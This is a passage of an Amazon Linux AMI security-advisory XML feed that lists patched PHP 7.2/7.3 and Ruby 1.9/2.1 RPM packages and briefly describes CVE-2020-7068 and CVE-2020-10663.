</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7068" title="" id="CVE-2020-7068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-ldap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.21-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1426</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1426: medium priority package update for ruby19 ruby21</title><issued date="2020-08-26 23:10:00" /><updated date="2020-08-31 20:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.23.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.9" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.9-1.23.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.9" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.9-1.23.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.23.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.23.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.23.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.23.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-33.71.amzn1.noarch.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-33.71.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package 